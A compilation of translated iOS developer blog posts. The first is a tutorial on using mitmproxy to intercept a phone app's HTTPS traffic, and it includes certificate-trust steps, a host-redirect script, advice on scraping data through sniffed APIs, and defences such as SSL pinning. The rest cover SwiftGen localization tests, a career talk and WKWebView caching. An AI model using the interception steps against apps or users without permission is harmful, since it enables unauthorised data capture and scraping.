Mac’s IP address = 192.168.2.1 (Note ⚠️ This is not the Ethernet IP, but the IP used by the Mac as a network sharing base station)
Settings -> WiFi -> HTTP Proxy -> Manual -> Enter Mac’s IP address in Server -> Enter 8080 in Port -> Save
At this point, it is normal for web pages not to open and for certificate errors to appear; let’s continue…
As mentioned above, the way a man-in-the-middle attack works is by using its own certificate to decrypt and encrypt data during communication; so we also need to install this custom certificate on the phone.
1. Open http://mitm.it on the phone’s Safari
Left side appears -> Proxy settings ✅ / Right side appears -> Proxy settings error 🚫
Apple -> Install Profile -> Install
⚠️ It’s not over yet, we need to enable the profile in the About section
General -> About -> Certificate Trust Settings -> Enable mitmproxy
Done! Now we can go back to the browser and browse web pages normally.
You can see the data transfer records from the phone on the mitmproxy Terminal
Find the record you want to sniff and view the Request (what parameters were sent) / Response (what content was returned)
" ? " = View key operation documentation
+" k " / "⬆" = Up
+" j " / "⬇" = Down
+" h " / "⬅" = Left
+" l " / "➡️" = Right
+" space " = Next page
+" enter " = View details
+" q " = Go back to the previous page/exit
+" b " = Export response body to a specified path text file
+" f " = Filter records
+" z " = Clear all records
+" e " = Edit Request (cookie, headers, params...)
+" r " = Resend Request
+
Besides the mitmproxy activation method, we can change to:
mitmweb
to use the new Web GUI for operation and observation.
mitmweb
After setting up and familiarizing yourself with the above environment, you can proceed to our main event; sniffing the data transmission content of the APP API!
Here we use a certain real estate APP as an example, purely for academic exchange with no malicious intent!
We want to know how the API for the object list is requested and what content is returned!
First press “z” to clear all records (to avoid confusion)
Open the target APP
Open the target APP and try “pull to refresh” or trigger the “load next page” action.
🛑If your target APP cannot be opened or connected; sorry, it means the APP has protection measures and cannot be sniffed using this method. Please scroll down to the section on how to protect it🛑
mitmproxy records
Go back to mitmproxy to check the records, use your detective skills to guess which API request record is the one we want and enter to view the details!
Request
In the Request section, you can see what parameters were passed in the request.
With “e” to edit and “r” to resend, and observing the Response, you can guess the purpose of each parameter!
Response
The Response section also directly provides the original returned content.
🛑If the Response content is a bunch of codes; sorry, it means the APP might have its own encryption and decryption, making it impossible to sniff using this method. Please scroll down to the section on how to protect it🛑
Hard to read? Chinese garbled text? No problem, you can use “b” to export it as a text file to the desktop, then copy the content to Json Editor Online for parsing!
Or directly use mitmweb to browse and operate using the web GUI
mitmweb
After sniffing, observing, filtering, and testing, you can understand how the APP API works, and thus use it to scrape data.
After collecting the required information, remember to turn off mitmproxy and change the mobile network proxy server back to automatic to use the internet normally.
If after setting up mitmproxy, you find that the APP cannot be used or the returned content is encoded, it means the APP has protection.
Method (1):
Generally, it involves placing a copy of the certificate information in the APP. If the current HTTPS certificate does not match the information in the APP, access is denied. For details, you can see this or find related resources on SSL Pinning. The downside might be the need to pay attention to the certificate’s validity period!
https://medium.com/@dzungnguyen.hcm/ios-ssl-pinning-bffd2ee9efc
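For reference, a minimal sketch of the SSL Pinning idea using a URLSessionDelegate is shown below. The bundled certificate file name and the comparison by raw DER data are assumptions for illustration (many teams pin the public key hash instead, or use a networking library's built-in pinning), and SecTrustCopyCertificateChain requires iOS 15+:

```swift
import Foundation
import Security

final class PinnedSessionDelegate: NSObject, URLSessionDelegate {
    // DER-encoded certificate bundled with the app (hypothetical file name).
    private lazy var pinnedCertificateData: Data? = {
        guard let url = Bundle.main.url(forResource: "api.example.com", withExtension: "cer") else { return nil }
        return try? Data(contentsOf: url)
    }()

    func urlSession(_ session: URLSession,
                    didReceive challenge: URLAuthenticationChallenge,
                    completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) {
        guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
              let serverTrust = challenge.protectionSpace.serverTrust,
              let serverCertificate = (SecTrustCopyCertificateChain(serverTrust) as? [SecCertificate])?.first,
              let pinnedData = pinnedCertificateData else {
            completionHandler(.cancelAuthenticationChallenge, nil)
            return
        }

        // Compare the leaf certificate presented by the server with the bundled copy.
        let serverCertificateData = SecCertificateCopyData(serverCertificate) as Data
        if serverCertificateData == pinnedData {
            completionHandler(.useCredential, URLCredential(trust: serverTrust))
        } else {
            // Mismatch: possibly a man-in-the-middle certificate, refuse the connection.
            completionHandler(.cancelAuthenticationChallenge, nil)
        }
    }
}

let pinnedSession = URLSession(configuration: .default, delegate: PinnedSessionDelegate(), delegateQueue: nil)
```

This is also why the downside mentioned above exists: when the server certificate is renewed, the copy bundled in the app has to be updated as well.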
Method (2):
The APP encodes and encrypts the data before transmission. The API backend decrypts it to obtain the original request content. The API response is also encoded and encrypted before being sent back. The APP decrypts the received data to get the response content. This method is cumbersome and inefficient, but it is indeed a way to protect data. As far as I know, some digital banks use this method for protection!
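As a rough illustration of Method (2), here is a hedged sketch using CryptoKit's AES-GCM. The shared key handling is deliberately simplified and hypothetical; a real design also has to protect the key itself (key exchange, obfuscation, etc.):

```swift
import CryptoKit
import Foundation

// Hypothetical shared secret; in practice the key must not simply be hard-coded in the app.
let symmetricKey = SymmetricKey(data: Data(SHA256.hash(data: Data("my-shared-secret".utf8))))

// Encrypt the request body before sending; the backend decrypts it with the same key.
func encryptBody(_ body: Data) throws -> Data {
    let sealedBox = try AES.GCM.seal(body, using: symmetricKey)
    return sealedBox.combined! // nonce + ciphertext + tag
}

// Decrypt the encrypted API response after receiving it.
func decryptBody(_ encrypted: Data) throws -> Data {
    let sealedBox = try AES.GCM.SealedBox(combined: encrypted)
    return try AES.GCM.open(sealedBox, using: symmetricKey)
}
```

This matches the trade-off described above: every request and response pays an extra encode/decode cost, and reverse engineering can still recover the key.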
Method 1 still has a way to be cracked: How to Bypass SSL Pinning on iOS 12
Method 2 can also be compromised through reverse engineering to obtain the encryption keys.
⚠️There is no 100% security⚠️
Or simply create a trap to collect evidence and solve it legally (?
“NEVER TRUST THE CLIENT”
1. Using mitmdump
Besides mitmproxy and mitmweb, mitmdump can directly export all records to a text file:
mitmdump -w /log.txt
You can also combine it with a Python script (as in point 2 below) to process and filter the recorded traffic:
mitmdump -ns examples/filter.py -r /log.txt -w /result.txt
2. Use a Python script for request parameter settings, access control, and redirection:
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    # pretty_host takes the "Host" header of the request into account,
    # which is useful in transparent mode where we usually only have the IP
    # otherwise.

    # Request header rewrite example:
    flow.request.headers['User-Agent'] = 'MitmProxy'

    if flow.request.pretty_host == "123.com.tw":
        flow.request.host = "456.com.tw"
        # Redirect all access from 123.com.tw to 456.com.tw
Redirection example
When starting mitmproxy, add the parameter:
mitmproxy -s /redirect.py
# or
mitmweb -s /redirect.py
# or
mitmdump -s /redirect.py
When using mitmproxy to observe requests that use HTTP/1.1 with Accept-Ranges: bytes and Content-Range (fetching a resource in segments over a persistent connection), it waits until the entire response has been received before displaying it, rather than showing the segments as they continue downloading over the persistent connection!
Since I don’t have domain permissions, I can’t obtain SSL certificate information, so I can’t implement it. The code doesn’t seem difficult, and although there’s no 100% secure method, adding an extra layer of protection can make it safer. Further attacks would require a lot of time to research, which should deter 90% of crawlers!
This article might be a bit low in value. I’ve neglected Medium for a while (playing with a DSLR). Mainly, this is to warm up for iPlayground 2019 this weekend (2019/09/21–2019/09/22). Looking forward to this year’s sessions 🤩, and hope to produce more quality articles after returning!
[Updated on 2019/02/22] What is the Experience of iPlayground 2019?
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Using SwiftGen & UnitTest to ensure the safety of multilingual operations
Photo by Mick Haupt
iOS handles multilingual support through Localizable.strings plain text files, unlike Android which uses XML format for management. This means there is a risk of accidentally corrupting or missing language files during daily development. Additionally, multilingual errors are not detected at Build Time and are often only discovered after release when users from a specific region report issues, significantly reducing user confidence.
A previous painful experience involved forgetting to add a `;` in Localizable.strings because I was too accustomed to Swift. This caused all subsequent strings in a particular language to break after release, and an urgent hotfix was needed to resolve the issue.
As shown above, if the `DESCRIPTION` Key is missing, the app will directly display `DESCRIPTION` to the user.
(missing `;`, valid Key-Value pairs)
The previous approach was "Use Swift to Write Shell Scripts Directly in Xcode!": referencing the Localize 🏁 tool, a Command Line Tool was developed in Swift for external multilingual file inspection, and the script was placed in a Build Phases Run Script to perform checks at Build Time.
Advantages: The inspection program is injected externally, not dependent on the project. It can be executed without XCode or building the project, and can pinpoint the exact line in a file where the issue occurs. Additionally, it can perform formatting functions (sorting multilingual Keys A-Z).
Disadvantages: Increases Build Time (~+3 mins), process divergence, and scripts are difficult to maintain or adjust according to project structure. Since this part is not within the project, only the person who added this inspection knows the entire logic, making it hard for other collaborators to touch this part.
Interested readers can refer to the previous article. This article mainly introduces how to achieve all of the Localizable.strings inspection functionality through Xcode 13 + SwiftGen + UnitTest.
After upgrading to Xcode 13, there is a built-in Build Time check of the Localizable.strings file format. The check is quite comprehensive: besides a missing `;`, it will also catch any extra meaningless strings.
SwiftGen helps us convert the original NSLocalizedString String access method to Object access, preventing typos and missing Key declarations.
SwiftGen is also a Command Line Tool; however, this tool is quite popular in the industry and has comprehensive documentation and community resources for maintenance. There is no need to worry about maintenance issues after introducing this tool.
You can choose the installation method according to your environment or CI/CD service settings. Here, we will use CocoaPods for a straightforward installation.
Please note that SwiftGen is not really a CocoaPod; it will not have any dependencies on the project’s code. Using CocoaPods to install SwiftGen is simply to download this Command Line Tool executable.
Add the SwiftGen pod to the Podfile:
pod 'SwiftGen', '~> 6.0'
Init
After `pod install`, open Terminal and `cd` to the project directory:
/L10NTests/Pods/SwiftGen/bin/swiftgen config init
Initialize the swiftgen.yml configuration file and open it:
strings:
  - inputs:
      - "L10NTests/Supporting Files/zh-Hant.lproj/Localizable.strings"
    outputs:
      templateName: structured-swift5
      output: "L10NTests/Supporting Files/SwiftGen-L10n.swift"
      params:
        enumName: "L10n"
Paste and modify it to fit your project's structure:
- inputs: the location of the project's localization files (it is recommended to specify the localization file of the DevelopmentLocalization language)
- outputs:
  - output: the location of the generated Swift file
  - params: enumName: the name of the generated object
  - templateName: the conversion template

You can use `swiftgen template list` to get the list of built-in templates.

flat vs. structured: if the Key style is `XXX.YYY.ZZZ`, the flat template converts it to camelCase, while the structured template converts it into an `XXX.YYY.ZZZ` object that follows the original structure.

Pure Swift projects can use the built-in templates directly, but a project that mixes Swift with Objective-C needs a custom template:

flat-swift5-objc.stencil:
// swiftlint:disable all
// Generated using SwiftGen — https://github.com/SwiftGen/SwiftGen

{% if tables.count > 0 %}
{% set accessModifier %}{% if param.publicAccess %}public{% else %}internal{% endif %}{% endset %}
import Foundation

// swiftlint:disable superfluous_disable_command file_length implicit_return

// MARK: - Strings

{% macro parametersBlock types %}{% filter removeNewlines:"leading" %}
  {% for type in types %}
    {% if type == "String" %}
    _ p{{forloop.counter}}: Any
    {% else %}
    _ p{{forloop.counter}}: {{type}}
    {% endif %}
    {{ ", " if not forloop.last }}
  {% endfor %}
{% endfilter %}{% endmacro %}
{% macro argumentsBlock types %}{% filter removeNewlines:"leading" %}
  {% for type in types %}
    {% if type == "String" %}
    String(describing: p{{forloop.counter}})
    {% elif type == "UnsafeRawPointer" %}
    Int(bitPattern: p{{forloop.counter}})
    {% else %}
    p{{forloop.counter}}
    {% endif %}
    {{ ", " if not forloop.last }}
  {% endfor %}
{% endfilter %}{% endmacro %}
{% macro recursiveBlock table item %}
  {% for string in item.strings %}
  {% if not param.noComments %}
  {% for line in string.translation|split:"\n" %}
  /// {{line}}
  {% endfor %}
  {% endif %}
  {% if string.types %}
  {{accessModifier}} static func {{string.key|swiftIdentifier:"pretty"|lowerFirstWord|escapeReservedKeywords}}({% call parametersBlock string.types %}) -> String {
    return {{enumName}}.tr("{{table}}", "{{string.key}}", {% call argumentsBlock string.types %})
  }
  {% elif param.lookupFunction %}
  {# custom localization function is mostly used for in-app lang selection, so we want the loc to be recomputed at each call for those (hence the computed var) #}
  {{accessModifier}} static var {{string.key|swiftIdentifier:"pretty"|lowerFirstWord|escapeReservedKeywords}}: String { return {{enumName}}.tr("{{table}}", "{{string.key}}") }
  {% else %}
  {{accessModifier}} static let {{string.key|swiftIdentifier:"pretty"|lowerFirstWord|escapeReservedKeywords}} = {{enumName}}.tr("{{table}}", "{{string.key}}")
  {% endif %}
  {% endfor %}
  {% for child in item.children %}
  {% call recursiveBlock table child %}
  {% endfor %}
{% endmacro %}
// swiftlint:disable function_parameter_count identifier_name line_length type_body_length
{% set enumName %}{{param.enumName|default:"L10n"}}{% endset %}
@objcMembers {{accessModifier}} class {{enumName}}: NSObject {
  {% if tables.count > 1 or param.forceFileNameEnum %}
  {% for table in tables %}
  {{accessModifier}} enum {{table.name|swiftIdentifier:"pretty"|escapeReservedKeywords}} {
    {% filter indent:2 %}{% call recursiveBlock table.name table.levels %}{% endfilter %}
  }
  {% endfor %}
  {% else %}
  {% call recursiveBlock tables.first.name tables.first.levels %}
  {% endif %}
}
// swiftlint:enable function_parameter_count identifier_name line_length type_body_length

// MARK: - Implementation Details

extension {{enumName}} {
  private static func tr(_ table: String, _ key: String, _ args: CVarArg...) -> String {
    {% if param.lookupFunction %}
    let format = {{ param.lookupFunction }}(key, table)
    {% else %}
    let format = {{param.bundle|default:"BundleToken.bundle"}}.localizedString(forKey: key, value: nil, table: table)
    {% endif %}
    return String(format: format, locale: Locale.current, arguments: args)
  }
}
{% if not param.bundle and not param.lookupFunction %}

// swiftlint:disable convenience_type
private final class BundleToken {
  static let bundle: Bundle = {
    #if SWIFT_PACKAGE
    return Bundle.module
    #else
    return Bundle(for: BundleToken.self)
    #endif
  }()
}
// swiftlint:enable convenience_type
{% endif %}
{% else %}
// No string found
{% endif %}
The above is a template collected from the internet and customized to be compatible with both Swift and Objective-C. You can create a flat-swift5-objc.stencil file and paste in the content, or click here to download the .zip.
If you use a custom template, you won't declare `templateName`; instead, declare `templatePath`:
swiftgen.yml:
strings:
  - inputs:
      - "L10NTests/Supporting Files/zh-Hant.lproj/Localizable.strings"
    outputs:
      templatePath: "path/to/flat-swift5-objc.stencil"
      output: "L10NTests/Supporting Files/SwiftGen-L10n.swift"
      params:
        enumName: "L10n"
Specify `templatePath` as the location of the `.stencil` template in the project.
Generator
After setting it up, you can run it manually in Terminal:
/L10NTests/Pods/SwiftGen/bin/swiftgen
Execute the conversion. After the first conversion, manually drag the converted result file (SwiftGen-L10n.swift) from Finder into the project so the program can use it.
Run Script
In the project settings -> Build Phases -> + -> New Run Script Phases -> paste:
if [[ -f "${PODS_ROOT}/SwiftGen/bin/swiftgen" ]]; then
  echo "${PODS_ROOT}/SwiftGen/bin/swiftgen"
  "${PODS_ROOT}/SwiftGen/bin/swiftgen"
else
  echo "warning: SwiftGen is not installed. Run 'pod install --repo-update' to install it."
fi
This way, the generator will run and produce the latest conversion results every time the project is built.
How to use in CodeBase?
L10n.homeTitle
L10n.homeDescription("ZhgChgLi") // with arg
With object access there will be no typos, and using a Key in code that is not declared in the Localizable.strings file can no longer happen.
However, SwiftGen can only generate from a specific language, so it cannot prevent the situation where a key exists in the generated language but is forgotten in other languages. This situation can only be protected by the following UnitTest.
Conversion
Conversion is the most challenging part, because a project that has been developed for a long time uses `NSLocalizedString` extensively. Converting it to the new `L10n.XXX` format is complex, especially for sentences with parameters (`String(format: NSLocalizedString(...), ...)`). Additionally, if Objective-C is mixed in, you must consider the syntax differences between Objective-C and Swift.
There is no special solution; you can only write a Command Line Tool yourself. Refer to the previous article on using Swift to scan the project directory and parse `NSLocalizedString` with Regex to write a small conversion tool.
It is recommended to convert one scenario at a time, making sure it still builds before converting the next one.
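As a rough idea of what such a conversion tool could look like, here is a hedged, minimal sketch. It only handles the simplest `NSLocalizedString("KEY", comment: "")` call sites and roughly mimics the flat template's camelCase naming; parameterized strings and Objective-C call sites would need their own rules:

```swift
import Foundation

// Minimal sketch: rewrite NSLocalizedString("home_title", comment: "") into L10n.homeTitle.
func convertToSwiftGen(_ source: String) -> String {
    let pattern = #"NSLocalizedString\(\s*"([^"]+)"\s*,\s*comment:\s*"[^"]*"\s*\)"#
    guard let regex = try? NSRegularExpression(pattern: pattern, options: []) else { return source }

    var result = source
    let fullRange = NSRange(source.startIndex..., in: source)
    // Replace from the last match to the first so earlier ranges stay valid.
    for match in regex.matches(in: source, options: [], range: fullRange).reversed() {
        guard let keyRange = Range(match.range(at: 1), in: source),
              let matchRange = Range(match.range, in: result) else { continue }

        // "home_title" / "home.title" -> homeTitle (rough camelCase, similar to the flat template)
        let parts = source[keyRange].split(whereSeparator: { $0 == "_" || $0 == "." }).map(String.init)
        let key = parts.enumerated()
            .map { $0.offset == 0 ? $0.element.lowercased() : $0.element.capitalized }
            .joined()

        result.replaceSubrange(matchRange, with: "L10n.\(key)")
    }
    return result
}
```

Run something like this over each source file, review the diff, and commit scenario by scenario as suggested above.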
We can write a UnitTest that reads the contents of the `.strings` files from the Bundle and tests them.
Read `.strings` from the Bundle and convert it into objects:
import XCTest

class L10NTestsTests: XCTestCase {

    private var localizations: [Bundle: [Localization]] = [:]

    override func setUp() {
        super.setUp()

        let bundles = [Bundle(for: type(of: self))]

        bundles.forEach { bundle in
            var localizations: [Localization] = []

            bundle.localizations.forEach { lang in
                var localization = Localization(lang: lang)

                if let lprojPath = bundle.path(forResource: lang, ofType: "lproj"),
                   let lprojBundle = Bundle(path: lprojPath) {

                    let filesInLPROJ = (try? FileManager.default.contentsOfDirectory(atPath: lprojBundle.bundlePath)) ?? []
                    localization.localizableStringFiles = filesInLPROJ.compactMap { fileFullName -> L10NTestsTests.Localization.LocalizableStringFile? in
                        let fileName = URL(fileURLWithPath: fileFullName).deletingPathExtension().lastPathComponent
                        let fileExtension = URL(fileURLWithPath: fileFullName).pathExtension
                        guard fileExtension == "strings" else { return nil }
                        guard let path = lprojBundle.path(forResource: fileName, ofType: fileExtension) else { return nil }

                        return L10NTestsTests.Localization.LocalizableStringFile(name: fileFullName, path: path)
                    }

                    localization.localizableStringFiles.enumerated().forEach { (index, localizableStringFile) in
                        if let fileContent = try? String(contentsOfFile: localizableStringFile.path, encoding: .utf8) {
                            let lines = fileContent.components(separatedBy: .newlines)
                            let pattern = "\"(.*)\"(\\s*)(=){1}(\\s*)\"(.+)\";"
                            let regex = try? NSRegularExpression(pattern: pattern, options: [])
                            let values = lines.compactMap { line -> Localization.LocalizableStringFile.Value? in
                                let range = NSRange(location: 0, length: (line as NSString).length)
                                guard let matches = regex?.firstMatch(in: line, options: [], range: range) else { return nil }
                                let key = (line as NSString).substring(with: matches.range(at: 1))
                                let value = (line as NSString).substring(with: matches.range(at: 5))
                                return Localization.LocalizableStringFile.Value(key: key, value: value)
                            }
                            localization.localizableStringFiles[index].values = values
                        }
                    }

                    localizations.append(localization)
                }
            }

            self.localizations[bundle] = localizations
        }
    }
}

private extension L10NTestsTests {
    struct Localization: Equatable {
        struct LocalizableStringFile {
            struct Value {
                let key: String
                let value: String
            }

            let name: String
            let path: String
            var values: [Value] = []
        }

        let lang: String
        var localizableStringFiles: [LocalizableStringFile] = []

        static func == (lhs: Self, rhs: Self) -> Bool {
            return lhs.lang == rhs.lang
        }
    }
}
We defined a `Localization` struct to store the parsed data: find the `lproj` folders from the `Bundle`, then find the `.strings` files inside them, and use regular expressions to convert the localized sentences into objects that are stored back into `Localization` for the subsequent tests.
Here are a few things to note:
- Use `Bundle(for: type(of: self))` to get resources from the Test Target
- The `.strings` files must be UTF-8 encoded, otherwise reading the file content using String will fail (the default is Binary)
- Add the `.strings` files to the Test Target

TestCase 1. Test for duplicate Keys in the same .strings file:
func testNoDuplicateKeysInSameFile() throws {
    localizations.forEach { (_, localizations) in
        localizations.forEach { localization in
            localization.localizableStringFiles.forEach { localizableStringFile in
                let keys = localizableStringFile.values.map { $0.key }
                let uniqueKeys = Set(keys)
                XCTAssertTrue(keys.count == uniqueKeys.count, "Localized Strings File: \(localizableStringFile.path) has duplicated keys.")
            }
        }
    }
}
Input:
Result:
TestCase 2. Compare with DevelopmentLocalization language to check for missing/redundant Keys:
func testCompareWithDevLangHasMissingKey() throws {
    localizations.forEach { (bundle, localizations) in
        let developmentLang = bundle.developmentLocalization ?? "en"
        if let developmentLocalization = localizations.first(where: { $0.lang == developmentLang }) {
            let othersLocalization = localizations.filter { $0.lang != developmentLang }

            developmentLocalization.localizableStringFiles.forEach { developmentLocalizableStringFile in
                let developmentLocalizableKeys = Set(developmentLocalizableStringFile.values.map { $0.key })
                othersLocalization.forEach { otherLocalization in
                    if let otherLocalizableStringFile = otherLocalization.localizableStringFiles.first(where: { $0.name == developmentLocalizableStringFile.name }) {
                        let otherLocalizableKeys = Set(otherLocalizableStringFile.values.map { $0.key })
                        if developmentLocalizableKeys.count < otherLocalizableKeys.count {
                            XCTFail("Localized Strings File: \(otherLocalizableStringFile.path) has redundant keys.")
                        } else if developmentLocalizableKeys.count > otherLocalizableKeys.count {
                            XCTFail("Localized Strings File: \(otherLocalizableStringFile.path) has missing keys.")
                        }
                    } else {
                        XCTFail("Localized Strings File not found in Lang: \(otherLocalization.lang)")
                    }
                }
            }
        } else {
            XCTFail("developmentLocalization not found in Bundle: \(bundle)")
        }
    }
}
Input: (Compared to DevelopmentLocalization, other languages lack the declaration Key)
Output:
Input: (DevelopmentLocalization does not have this Key, but it appears in other languages)
Output:
Combining the above methods, we use:
One thing this solution cannot cover is the formatting feature (sorting multilingual Keys A-Z); the original Command Line Tool written in Swift is still needed for that. However, the format step can be done in a git pre-commit hook and skipped when the localization files have no diff, so it doesn't run on every build:
#!/bin/sh

diffStaged=${1:-\-\-staged} # use $1 if it exists, default --staged.

git diff --diff-filter=d --name-only $diffStaged | grep -e 'Localizable.*\.\(strings\|stringsdict\)$' | \
while read line; do
  # do format for ${line}
done
The same principle can be applied to .stringsdict files.
swiftgen does not need to run in a Build Phase on every build (the generated code only becomes available after the build finishes anyway); it can be changed to run only when the localization files are actually adjusted.
The UnitTest program can be optimized to output clearly which Key is Missing/Redundant/Duplicate.
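For example, TestCase 2 could be extended roughly along these lines (a hedged sketch that reuses the `localizations` dictionary and `Localization` structure parsed in `setUp()` and belongs inside the same `L10NTestsTests` class):

```swift
func testReportMissingAndRedundantKeys() throws {
    localizations.forEach { (bundle, localizations) in
        let developmentLang = bundle.developmentLocalization ?? "en"
        guard let devLocalization = localizations.first(where: { $0.lang == developmentLang }) else { return }

        devLocalization.localizableStringFiles.forEach { devFile in
            let devKeys = Set(devFile.values.map { $0.key })
            localizations.filter { $0.lang != developmentLang }.forEach { otherLocalization in
                guard let otherFile = otherLocalization.localizableStringFiles.first(where: { $0.name == devFile.name }) else { return }
                let otherKeys = Set(otherFile.values.map { $0.key })

                let missing = devKeys.subtracting(otherKeys)   // declared in the dev language, absent here
                let redundant = otherKeys.subtracting(devKeys) // present here, absent in the dev language

                XCTAssertTrue(missing.isEmpty, "\(otherFile.path) is missing keys: \(missing.sorted())")
                XCTAssertTrue(redundant.isEmpty, "\(otherFile.path) has redundant keys: \(redundant.sorted())")
            }
        }
    }
}
```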
As mentioned in the previous talk “ 2021 Pinkoi Tech Career Talk — High-Efficiency Engineering Team Unveiled “, in large teams, multilingual work can be separated through third-party services, reducing the dependency on multilingual work.
Engineers only need to define the Key, and multilingual content will be automatically imported from the platform during the CI/CD stage, reducing the manual maintenance phase and making it less prone to errors.
Wei Cao , iOS Developer @ Pinkoi
For any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Pinkoi Developers’ Night 2022 Year-End Exchange Meeting — 15 Minutes Career Sharing Talk
Event Link: Linkedin
Main Audience: Students from various universities and colleges majoring in information-related fields
Location and Time: 2022/12/01 7:00 PM — 9:00 PM
Sharing Duration: 15 mins
Currently serving as Pinkoi Platform (App) Engineer Lead and iOS Engineer. Previously worked at StreetVoice, Addcn Technology (listed company 5287), and a startup. Self-taught in web programming since vocational high school, won the National Skills Competition championship in the web design category and was a reserve national team representative, graduated from the Department of Information Management at National Taiwan University of Science and Technology, and transitioned to iOS App development in 2017.
Passionate about exploration and technical exchange, also writes about daily life or unboxing experiences, welcome to follow my Medium Blog.
Pinkoi products support desktop, mobile, iOS, Android platforms, and six languages: Traditional Chinese, Hong Kong Traditional, Simplified Chinese, Japanese, Thai, and English.
Behind the scenes, there are 8+ squad teams responsible for different aspects of work, such as: Buyer Squad for the buyer side, Seller Squad for the seller side, Platform Squad for the underlying platform, AI Squad for algorithms, etc., working together to build Pinkoi products.
Note: This image does not represent a comprehensive or up-to-date Tech Stack
To do a good job, one must first sharpen one’s tools. The above image lists the Tech Stack and tools/services used by the Pinkoi development team; it also lists cross-team collaboration tools such as Slack, Asana, Figma, etc.
As the team size grows, there will be more times when communication or repetitive work is needed. At this time, by introducing tool services, we can effectively untangle the connections between people and increase team work efficiency.
At Pinkoi, although engineers are assigned to various Squad Teams, they still work together with one heart, Win as a team, we are still the same family.
Teammates with the same functions (e.g. iOS/Android/BE/FE/Data…) not only hold regular technical exchange sharing sessions, but also conduct Code Reviews and System Design discussions in daily development; discussing together, growing together!
The “Guai Guai” tattoo sticker in the middle of the picture is a blessing ceremony for the launch of the team’s “Gift List” feature and the “2022 Pinkoi Design Fest” event, ensuring the service is safe and stable.
In addition to completing tasks, Engineers have many ways to help advance business goals:
First, aside from the Engineer role, starting from oneself; we can propose our own life usage experiences and various creative ideas during the project planning period. For example, observing friends’ usage habits or new trendy cool things (e.g. iOS 16 Dynamic Island), brainstorming together might turn an ordinary feature into a new highlight!
Then back to engineering itself, the first is of course the essential development ability. Good development ability can maintain scalability and stability, reduce technical debt, and lower future maintenance costs, indirectly increasing business value. Similarly, the correct technical choices can maximize value with limited development resources; all these require a lot of hard skills and experience accumulation.
In addition, leveraging communication and coordination skills can make cross-engineering discussions more efficient, and leveraging collaboration skills can reduce rework; all can greatly increase team output and further advance business goals.
In summary, engineers definitely do not only create value by writing code.
At Pinkoi, Squad Team Sync-ups or project discussion meetings involve not only engineers but also designers, PMs, and analysts, participating in project discussions together; everyone can propose their own ideas, sparking different inspirations.
From personal experience, startup culture (also in Pinkoi) has five characteristics:
These characteristics are relatively rare in traditional large companies. Traditional companies are mostly more closed and rigid, with little room for suggestions, limited things to see and do, and more resistant to new changes and attempts; it is relatively difficult for energetic newcomers to perform.
Engineer at 28 vs. Engineer at 46 (Elon Musk was also an engineer); although it’s a meme, it means that what kind of engineer you want to become is up to you.
Besides having lean development skills, I believe the mindset is even more important. Life is a journey with many stages and roles to fulfill. The first is to constantly step out of your comfort zone and be prepared to face higher challenges. For example, I initially started as a backend engineer, then transitioned to iOS development, and now I’m starting to take on management roles.
The second is the exploration of direction. Do not limit yourself; everyone has infinite possibilities. You can continuously adjust to find the direction that suits you and shine in your area of expertise. We have teammates who switched to engineering later in their careers or transitioned from designers to PMs. Additionally, think about what role you want to play at 30 or 40 years old, such as continuing to delve into technology to become an architect/Tech Lead or taking on management roles.
Also, lifelong learning is essential. Knowledge is endless, especially in the information industry, which is ever-changing. Without seeking innovation and change, it’s easy to be eliminated by the industry.
Lastly, maintaining a balance between work and life is also crucial. Work Hard, Play Hard not only improves work efficiency but also allows you to draw inspiration from life experiences. As mentioned earlier, a small idea might change the world and create higher commercial value!
I advise newcomers to choose carefully for their first few jobs. The sunk cost is very low when you first enter society. Prioritize finding a job where you can learn something. Try to join companies that develop their own products (e.g., Pinkoi /Line/StreetVoice…) and avoid changing jobs too frequently (stay for at least a year). This will be very beneficial for your future career.
Life is long, and I hope everyone finds their own path. Thank you.
Join Pinkoi now » https://www.pinkoi.com/about/careers
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Study on improving page loading speed by preloading and caching resources in iOS WKWebView.
Photo by Antoine Gravier
For some reason, I have always been quite connected to "Cache". I was previously responsible for researching and implementing the "iOS HLS Cache Implementation Journey" and the "Comprehensive Guide to Implementing Local Cache Functionality in AVPlayer" for AVPlayer. Unlike streaming caching, whose goal is to reduce playback traffic, this time the main task is to improve the loading speed of the in-app WKWebView, which also involves research on preloading and caching in WKWebView. To be honest, though, the WKWebView scenario is more complex: AVPlayer streams audio and video as one or more continuous chunk files, so only file caching is needed, while WKWebView has not only its own page file but also imported resource files (.js, .css, fonts, images...), which the Browser Engine renders into the page shown to the user. There are too many things in between that the app cannot control, from the network to the frontend page's JavaScript performance and rendering approach, and all of them take time.
This article is only a feasibility study of the iOS-side techniques and may not be the final solution. In general, it is recommended that frontend developers start from the frontend, where a significant effect can be achieved: optimize the time until the first content appears on the screen (First Contentful Paint) and improve the HTTP Cache mechanism. This speeds up Web/mWeb itself, improves the speed of the Android/iOS in-app WebView, and also improves Google SEO ranking.
According to Apple Review Guidelines 2.5.6:
Apps that browse the web must use the appropriate WebKit framework and WebKit JavaScript. You may apply for an entitlement to use an alternative web browser engine in your app. Learn more about these entitlements.
Apps can only use the WebKit framework provided by Apple (WKWebView) and are not allowed to use third-party or modified WebKit engines. Otherwise, they will not be allowed on the App Store; starting from iOS 17.4, to comply with regulations, the EU region can use other Browser Engines after obtaining special permission from Apple.
If Apple doesn’t allow it, we can’t do it either.
[Unverified] Information suggests that even the iOS versions of Chrome and Firefox can only use Apple WebKit (WKWebView).
Another very important thing to note:
WKWebView runs on a separate thread outside the main app thread, so all requests and operations do not go through our app.
The HTTP protocol includes a Cache protocol, and the system has already implemented a Cache mechanism in all components related to the network (URLSession, WKWebView…). Therefore, the Client App does not need to implement anything, and it is not recommended for anyone to create their own Cache mechanism. Directly following the HTTP protocol is the fastest, most stable, and most effective approach.
The general operation process of HTTP Cache is as shown in the diagram above:
In addition to local cache, there may also be network caches on Network Proxy Servers or along the way.
Common HTTP Response Cache Header parameters:
expires: RFC 2822 date
pragma: no-cache
# Newer parameters:
cache-control: private/public/no-store/no-cache/max-age/s-max-age/must-revalidate/proxy-revalidate...
etag: XXX
Common HTTP Request Cache Header parameters:
